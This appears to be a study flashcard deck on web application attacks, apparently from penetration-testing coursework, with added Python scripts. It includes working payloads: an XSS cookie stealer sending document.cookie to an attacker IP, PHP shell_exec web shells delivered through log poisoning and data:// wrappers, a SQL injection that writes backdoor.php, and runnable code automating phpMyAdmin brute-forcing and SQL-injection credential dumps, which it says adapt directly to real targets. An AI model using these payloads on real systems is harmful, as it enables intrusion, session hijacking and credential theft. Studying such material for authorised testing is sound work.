Web Application Attacks Flashcards

1
Q

What is the first thing you should do before launching an attack on a web server?

A

Discover the technology stack in use:

  • Programming language and frameworks
  • Web server software
  • Database software
  • Server operating system
2
Q

What are common web site enumeration steps?

A
  1. Inspect URLs: file extensions hint at the language or framework, such as .php, .jsp, .do (Java), while .html usually means static content
  2. Inspect page content: browser developer tools reveal JavaScript frameworks, hidden input fields, HTML comments and client-side controls implemented in HTML or JavaScript
  3. View response headers: in Firefox, the Network tab of the Web Developer tools; headers such as Server and X-Powered-By often name the server software and language version
  4. Inspect site maps: robots.txt and sitemap.xml list paths the site wants (or does not want) crawled; fetch them with curl
  5. Locate administrator consoles (for example /phpmyadmin, /admin, /manager)
3
Q

How would you use ‘curl’ to get robots.txt for google.com?

A

curl https://www.google.com/robots.txt

4
Q

What is the open source web server scanner?

A

Nikto

5
Q

How would you run Nikto against megacorpone.com for 30 seconds?

A

nikto -host=http://www.megacorpone.com -maxtime=30s

6
Q

How can you use Intruder to brute force a phpMyAdmin login page if there is a unique ‘set_session’ value and a ‘token’ value required for each login?

A
  1. Positions tab: mark four payload positions: the phpMyAdmin session cookie, set_session, the password, and token
  2. Select "Pitchfork" as the attack type (one payload set per position, all advanced in lockstep)
  3. Options tab > Grep - Extract > Add: define an extraction that starts after _session" value=" and ends at " />Log (this grabs the set_session value)
  4. Add a second Grep - Extract: start after en" value=" and end at " />\n\n (this grabs the token value)
  5. Payloads tab: payload set 1 is the phpMyAdmin session cookie; set the payload type to "Recursive Grep" and select the first extraction defined above
  6. Payloads tab: payload set 2 is set_session; it must match the value of the phpMyAdmin cookie, so use the same Recursive Grep extraction as set 1
  7. Payloads tab: payload set 3 is the password; use a simple list of passwords
  8. Payloads tab: payload set 4 is the token; use the second Recursive Grep extraction
  9. Recursive Grep takes each value from the previous response, so the attack has to run with a single thread
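The lockstep the Intruder recipe describes, written out as a loop, added here as an example that is not from the deck, Burp or phpMyAdmin. FakePhpMyAdmin is a constructed stand-in that issues a fresh set_session/token pair on every GET and only accepts a POST whose cookie, set_session and token all match; the pma_username/pma_password field names are assumed to be the login form's field names. The point it makes is why a plain wordlist attack fails: every attempt must re-fetch the form and carry the freshly extracted values in three positions at once.

```python
import re
import secrets

# Regexes equivalent to the two "Grep - Extract" rules on the card:
# the hidden set_session field and the hidden token field of the login form.
SESSION_RE = re.compile(r'name="set_session"\s+value="([^"]+)"')
TOKEN_RE = re.compile(r'name="token"\s+value="([^"]+)"')


def extract_login_tokens(html: str):
    """Return (set_session, token) from a phpMyAdmin login page, or raise if absent."""
    session = SESSION_RE.search(html)
    token = TOKEN_RE.search(html)
    if not (session and token):
        raise ValueError("login form does not carry set_session/token fields")
    return session.group(1), token.group(1)


class FakePhpMyAdmin:
    """Constructed stand-in for the login flow (not phpMyAdmin's real code):
    every GET issues a fresh set_session and token; a POST is accepted only if the
    phpMyAdmin cookie equals set_session, the token is the one issued for that
    session, and the password is right. Tokens are single-use."""

    def __init__(self, password: str):
        self.password = password
        self.issued = {}  # set_session -> token

    def get_login_page(self) -> str:
        session = secrets.token_hex(16)
        token = secrets.token_hex(8)
        self.issued[session] = token
        return (
            '<form method="post" action="index.php" name="login_form">\n'
            f'<input type="hidden" name="set_session" value="{session}" />Log in\n'
            f'<input type="hidden" name="token" value="{token}" />\n\n'
            "</form>\n"
        )

    def post_login(self, cookies: dict, form: dict) -> str:
        session = cookies.get("phpMyAdmin")
        ok = (
            session is not None
            and session == form.get("set_session")
            and self.issued.pop(session, None) == form.get("token")
            and form.get("pma_password") == self.password
        )
        return "Log out" if ok else "Cannot log in to the MySQL server"


def brute_force(get_login_page, post_login, username, passwords):
    """Pitchfork logic: each attempt re-fetches the form and feeds the freshly
    extracted values into the cookie, set_session and token positions together."""
    for password in passwords:
        session, token = extract_login_tokens(get_login_page())  # the recursive grep step
        cookies = {"phpMyAdmin": session}           # payload set 1: session cookie
        form = {
            "set_session": session,                 # payload set 2: same value as the cookie
            "pma_username": username,               # assumed field name
            "pma_password": password,               # payload set 3: wordlist (assumed field name)
            "token": token,                         # payload set 4: second grep extract
        }
        if "Log out" in post_login(cookies, form):
            return password
    return None


if __name__ == "__main__":
    server = FakePhpMyAdmin("letmein")
    print(brute_force(server.get_login_page, server.post_login, "root",
                      ["password", "123456", "letmein"]))
```

Against a real target, get_login_page and post_login would be thin wrappers around an HTTP client; the structure of the loop is the same, and it has to be sequential for the same reason Burp forces Recursive Grep onto one thread.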
7
Q

What would be your next action to take after successfully logging into phpMyAdmin console?

A

Run SQL queries against the application's user table(s) to extract stored credentials

8
Q

What allows XSS to take place?

A

The web application places unsanitized user input into a page without output encoding, so an attacker can inject HTML or JavaScript that the victim's browser then executes.

9
Q

Stored XSS

A
  • aka Persistent XSS
  • occurs when the exploit payload is stored in a database or otherwise cached by the server
  • the web application then retrieves this payload and renders it for anyone who views the vulnerable page
  • a single stored XSS payload can therefore attack everyone who visits the page
10
Q

Reflected XSS

A
  • the payload is usually included in a crafted request or link
  • the web application takes this value and places it into the page content
  • this variant only attacks the person submitting the request or opening the link
  • often occurs in search fields and results, and anywhere user input is echoed in error messages
11
Q

URL Encoding

A
  • sometimes referred to as percent encoding
  • used to represent characters that are reserved or not allowed in a URL (spaces, non-ASCII characters, and delimiters such as &, =, / and ?) as a percent sign followed by the byte's hex value
  • Example: converting 'space' to %20
12
Q

HTML Encoding

A
  • used to display characters that normally have special meaning in HTML, such as tag delimiters, as literal text
  • Example: &lt; is the character reference for <, &gt; for >, &quot; for "
13
Q

What is a simple way to see if a web page is sanitizing data, or not?

A
  • if there is a comment posting page, such as a blog post, enter hello " ; < > ' and see whether the characters are posted as they are
  • if the characters are posted as-is rather than HTML encoded (&quot; &lt; &gt; &#39;), the site does not sanitize or encode user input in that context
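The encoding cards and the probe test above, put into code as an added example (not from the deck): a URL encoder and an HTML encoder built on Python's standard library, three constructed comment renderers (one raw, one that only neutralises tags, one fully encoded) standing in for the comment page, and a check that probes each special character separately, because a page that encodes < and > but leaves quotes alone still lets an attacker break out of an attribute value.

```python
import html
from urllib.parse import quote

SPECIAL = '<>"\''                  # the characters that matter for injecting markup
PROBE = 'hello " ; < > \''         # the card's test string


def url_encode(text: str) -> str:
    """Percent-encode every character that is reserved or not allowed in a URL."""
    return quote(text, safe="")


def html_encode(text: str) -> str:
    """Replace HTML-significant characters with character references."""
    return html.escape(text, quote=True)


def render_unsafe(comment: str) -> str:
    """Constructed vulnerable comment page: the comment is inserted untouched."""
    return f'<p class="comment">{comment}</p>'


def render_partial(comment: str) -> str:
    """Common half-fix: tags are neutralised but quotes survive, which still
    breaks out of attribute values such as value="...". """
    return f'<p class="comment">{html.escape(comment, quote=False)}</p>'


def render_safe(comment: str) -> str:
    """Hardened page: the comment is HTML-encoded before insertion."""
    return f'<p class="comment">{html_encode(comment)}</p>'


def classify_reflection(probe: str, page: str) -> str:
    """'raw' if the probe appears verbatim (markup characters reach the page unencoded),
    'encoded' if it only appears after decoding character references, else 'absent'.
    html.unescape handles &#39;, &#x27; and &apos; alike, so the check is independent
    of which reference the site chose."""
    if probe in page:
        return "raw"
    if probe in html.unescape(page):
        return "encoded"
    return "absent"


def reflection_report(page_for, marker: str = "xsstest") -> dict:
    """Probe one special character at a time so a partial encoder is not mistaken
    for a full one. page_for(comment) returns the page that reflects that comment."""
    report = {}
    for c in SPECIAL:
        probe = f"{marker}{c}{marker}"
        report[c] = classify_reflection(probe, page_for(probe))
    return report


if __name__ == "__main__":
    print(url_encode("hello world"), html_encode(PROBE))
    for renderer in (render_unsafe, render_partial, render_safe):
        print(renderer.__name__, reflection_report(renderer))
```

Against a live site, page_for would submit the comment and return the response body; the report then tells you which characters are usable in a payload for that particular injection point.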
14
Q

What is a stealthy alternative to a XSS redirect?

A
  • inject an invisible iframe (height and width 0) into our XSS payload instead of a redirect, so the victim sees nothing
  • the iframe embeds the file "report" from our attack machine into the page
  • once this payload has been submitted, any user that visits the page silently connects back to our attack machine
15
Q

What are the two Cookie flags that are of most interest to an attacker?

A
  • Secure
  • HttpOnly

16
Q

What does the Secure flag in a Cookie do?

A
  • instructs the browser to only send the cookie over encrypted connections, such as HTTPS
  • this protects the Cookie from being sent in cleartext and captured over the network
17
Q

What does the HttpOnly flag in a Cookie do?

A
  • instructs the browser to deny JavaScript access to the cookie
  • if the HttpOnly flag is NOT set, we can use an XSS payload to steal the cookie
18
Q

How can we capture a victim's PHPSESSID cookie?

A
  • We use JavaScript to read the cookie and append it to an image URL that points back to our attack machine.
  • The browser evaluates the image source and sends a GET request to our attack system with the victim's cookie in the URL query string.
  • To implement the cookie stealer, the XSS payload becomes:
    • new Image().src="http://10.11.0.4/cool.jpg?output="+document.cookie;
  • When a victim visits the page containing this script, their browser connects to the 10.11.0.4 attacking machine (for example a Netcat listener on port 80) and we receive:
    • GET /cool.jpg?output=PHPSESSID=ua19spm8i3t1l9acl9m2tfi76 HTTP/1.1
  • We can then use Cookie-Editor in Firefox to add the stolen cookie to our own session and browse as the victim
  • This only works for cookies without the HttpOnly flag, since document.cookie cannot read those
19
Q

Directory Traversal Vulnerabilities

A
  • aka Path Traversal
  • allows attackers to read files inside the application or files normally not reachable through the web interface, such as files outside the web root directory
  • occurs when input is poorly validated, letting an attacker manipulate file paths with "../" (or "..\" on Windows) sequences
20
Q

If we see the end of a URL containing “/menu?file=current_menu.php”…how should we attack this for Directory Traversal Vulnerabilities?

A
  • First, change the "file" value to something arbitrary, such as file=old.php
  • If the error message discloses a full file path, the parameter is being used to build a path on disk and is likely vulnerable
  • Next, try a file outside the web root, such as file=c:\windows\system32\drivers\etc\hosts on Windows (prefix it with ../ sequences if the application prepends its own directory)
21
Q

What is a file inclusion vulnerability?

A
  • allows an attacker to include a file into the application’s running code
  • Local File Inclusion (LFI) occurs when the included file is loaded from the same web server
  • Remote File Inclusion (RFI) occurs when the included file is loaded from an external source.
  • This is typically found in PHP applications
22
Q

In order to exploit a file inclusion vulnerability, what is required?

A
  • the ability to execute code
  • the ability to write our shell payload somewhere the application can include it

23
Q

How can you exploit LFI using Log Files?

A
  • We can try to inject code onto the server through log file poisoning
  • Most application servers will log all URLs that are requested
  • We can take advantage of this by submitting a request that includes PHP code
  • Once the request is logged, we can use the log file in our LFI payload.
24
Q

Example LFI using Log File Poisoning?

A
  1. Open a raw connection with Netcat: nc -nv 10.11.0.22 80
  2. Send the PHP payload as the request line: <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
     ** The server answers 400 Bad Request, but the request line has been written to the access log, so the log now contains PHP code **
  3. Include the log through the LFI: http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
     ** The response contains the contents of access.log, with the output of 'ipconfig' where the poisoned entry was **
25
Q

How can you exploit LFI with PHP Wrappers; provide an example?

A
  • we can use the ‘data’ wrapper to embed inline data as part of the URL with plaintext or base64 encoded data
  • this wrapper provides us with an alternative payload when we cannot poison a local file with PHP code
  • we start with “data:” followed by the type of data…in this case “text/plain”
  • we follow this with a comma to mark the start of the contents, in this case “hello world”
    • http://10.11.0.22/menu.php?file=data:text/plain,hello world
26
Q

Example: execute code by exploiting LFI with PHP Wrappers?

A

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec($_GET['cmd']);?>&cmd=ipconfig

27
Q

Example: What is a basic SQL Injection attack?

A
    • select * from users where name = 'tom' or 1=1;#' and password = 'jones';
  • ** The '#' is a comment marker in MySQL/MariaDB and effectively removes the rest of the statement; 'or 1=1' makes the WHERE clause true for every row ***
28
Q

Example: What is a basic SQL Injection attack where we limit the returned values to 1?

A

select * from users where name = 'tom' or 1=1 LIMIT 1;#

29
Q

What are the steps of Enumerating a Database via SQL Injection Attack in the URL?

A
  1. Column number enumeration
  2. Understand the layout of the output
  3. Extract data from the database
30
Q

How can you verify that the page /debug.php is vulnerable to SQL Injection?

A
  1. http://10.11.0.22/debug.php?id='
  2. If we get an error message about SQL syntax, the quote reached the database parser unescaped and we have SQL injection

31
Q

Given a page /debug.php that is vulnerable to SQL Injection, how do you enumerate the number of columns returned by the query?

A
  1. http://10.11.0.22/debug.php?id=1 order by 1
     - This query instructs the database to sort the results by the first column.
     - If the query returns at least one column, the query is valid and the page renders without errors.
     - We submit further queries, incrementing the 'order by' value each time, until the query generates an error, indicating that the number of columns returned by the query has been exceeded.
  2. Send the request to Repeater and increment the 'order by' value by 1 until you receive an error in the response; the last value that worked is the column count
32
Q

If we have enumerated the number of columns in a table, how can we find out more about each column?

A
    • We use a UNION statement to see which columns are displayed on screen
    • This additional select returns one row with three columns holding the values 1, 2 and 3 (a UNION must have the same number of columns as the original query); the numbers that show up in the page tell us which columns are rendered
    • /debug.php?id=1 union all select 1, 2, 3
33
Q

If we have enumerated the number of columns in a table, how can we find out what database software is being used?

A

/debug.php?id=1 union all select 1, 2, @@version

34
Q

If we have enumerated the number of columns in a table, how can we find out what database user is being used?

A

/debug.php?id=1 union all select 1, 2, user()

35
Q

If we have enumerated the number of columns in a table, how can we find out additional information such as Table names?

A

/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

36
Q

If we have discovered a table named USERS, how can we find out the names of columns in this table?

A

/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

37
Q

From the table USERS, we discover columns named USERNAME and PASSWORD. How can we display information from these columns?

A

/debug.php?id=1 union all select 1, username, password from users
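The enumeration sequence of the last eight cards (quote test, ORDER BY column counting, UNION markers, version, table listing, credential dump) automated end to end, as an added example that is not from the deck. make_debug_page is a constructed stand-in for /debug.php that concatenates the id parameter into its query, backed by an in-memory SQLite database so the example runs offline; the payloads are the deck's, but the version function and catalog table differ between engines (MySQL's @@version and information_schema versus SQLite's sqlite_version() and sqlite_master), which the comments mark.

```python
import sqlite3


def make_debug_page():
    """Constructed stand-in for the vulnerable /debug.php (assumption: same bug as the deck's
    page). Returns a function that takes the raw id parameter and returns rows, raising
    sqlite3.Error where the PHP page would show a SQL error."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE menu(id INTEGER, item TEXT, price TEXT);
        INSERT INTO menu VALUES (1, 'Burger', '5.00'), (2, 'Salad', '4.00');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t'), ('tom', 'jones');
    """)

    def debug_page(id_param: str):
        sql = f"SELECT id, item, price FROM menu WHERE id = {id_param}"  # the injection point
        return con.execute(sql).fetchall()

    return debug_page


def is_injectable(page) -> bool:
    """A lone quote that yields a SQL syntax error shows input reaches the parser unescaped."""
    try:
        page("'")
        return False
    except sqlite3.Error:
        return True


def count_columns(page, max_cols: int = 20) -> int:
    """ORDER BY n succeeds while n <= number of columns and errors once past it."""
    for n in range(1, max_cols + 1):
        try:
            page(f"1 order by {n}")
        except sqlite3.Error:
            return n - 1
    raise RuntimeError(f"more than {max_cols} columns")


def union_rows(page, cols: int, exprs, from_clause: str = ""):
    """Pad a UNION ALL SELECT with numeric markers to match the column count, put our
    expressions in the last columns, and return only the rows the UNION added."""
    if len(exprs) > cols:
        raise ValueError("more expressions than columns")
    markers = [str(i + 1) for i in range(cols)]
    markers[cols - len(exprs):] = list(exprs)
    injection = f"1 union all select {', '.join(markers)} {from_clause}".rstrip()
    baseline = page("1")
    return [row for row in page(injection) if row not in baseline]


def db_version(page, cols: int) -> str:
    # MySQL: @@version.  SQLite: sqlite_version()
    return union_rows(page, cols, ["sqlite_version()"])[0][-1]


def list_tables(page, cols: int):
    # MySQL: table_name from information_schema.tables.  SQLite: name from sqlite_master
    rows = union_rows(page, cols, ["name"], "from sqlite_master where type='table'")
    return sorted(row[-1] for row in rows)


def dump_credentials(page, cols: int):
    """Pull username and password through the last two rendered columns."""
    rows = union_rows(page, cols, ["username", "password"], "from users")
    return [(row[-2], row[-1]) for row in rows]


if __name__ == "__main__":
    page = make_debug_page()
    print("injectable:", is_injectable(page))
    n = count_columns(page)
    print("columns:", n, "version:", db_version(page, n))
    print("tables:", list_tables(page, n))
    print("credentials:", dump_credentials(page, n))
```

Against a real page the only change is that debug_page becomes an HTTP request and "raises" becomes "the response contains the SQL error string"; the ORDER BY loop and the marker padding are the same, and the baseline subtraction in union_rows is what separates the application's own row from the rows the UNION smuggled in.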

38
Q

How can SQL Injection be leveraged for Code Execution?

A

  • First confirm that the database user can reach the file system: load_file() returns a file's contents inside the page (in MySQL this needs the FILE privilege)
    • /debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
  • If that works, the same privilege lets us write a PHP file into the web root with INTO OUTFILE and then request it through the web server, which gives code execution

39
Q

How can SQL Injection be leveraged to create a malicious PHP file within the server’s web root?

A
  • -/debug.php?id=1 union all select 1, 2, “” into OUTFILE ‘c:/xampp/htdocs/backdoor.php’
  • ** This command produces an error message but this doesn’t mean the file creation was unsuccessful
  • ** Access the newly created ‘backdoor.php’ with a ‘cmd’ parameter such as ‘ipconfig’
    • /backdoor.php?cmd=ipconfig